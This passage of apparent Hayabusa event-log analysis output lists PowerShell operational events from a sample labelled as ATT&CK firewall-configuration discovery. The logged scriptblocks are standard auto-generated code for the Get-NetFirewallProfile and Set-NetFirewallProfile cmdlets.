[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = 
$false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.067 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallProfile""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.067 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallProfile""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated 
(PowerShell).evtx +2021-10-25 07:23:06.067 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.067 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.067 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.067 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall 
configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.067 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallProfile { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultInboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${DefaultOutboundAction}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowInboundRules}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalFirewallRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowLocalIPsecRules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserApps}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUserPorts}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${AllowUnicastResponseToMulticast}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${NotifyOnListen}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStealthModeForIPsec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LogFileName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint64] ${LogMaxSizeKilobytes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogAllowed}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogBlocked}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${LogIgnored}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DisabledInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; 
Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultInboundAction')) { [object]$__cmdletization_value = ${DefaultInboundAction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultOutboundAction')) { [object]$__cmdletization_value = ${DefaultOutboundAction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultOutboundAction'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowInboundRules')) { [object]$__cmdletization_value = ${AllowInboundRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalFirewallRules')) { [object]$__cmdletization_value = ${AllowLocalFirewallRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalFirewallRules'; 
ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalIPsecRules')) { [object]$__cmdletization_value = ${AllowLocalIPsecRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdleti",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.067 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"zation_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserApps')) { [object]$__cmdletization_value = ${AllowUserApps} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserPorts')) { [object]$__cmdletization_value = ${AllowUserPorts} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUnicastResponseToMulticast')) { [object]$__cmdletization_value = ${AllowUnicastResponseToMulticast} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NotifyOnListen')) { [object]$__cmdletization_value = ${NotifyOnListen} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStealthModeForIPsec')) { [object]$__cmdletization_value = ${EnableStealthModeForIPsec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogFileName')) { [object]$__cmdletization_value = ${LogFileName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue 
= $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogMaxSizeKilobytes')) { [object]$__cmdletization_value = ${LogMaxSizeKilobytes} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogAllowed')) { [object]$__cmdletization_value = ${LogAllowed} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogBlocked')) { 
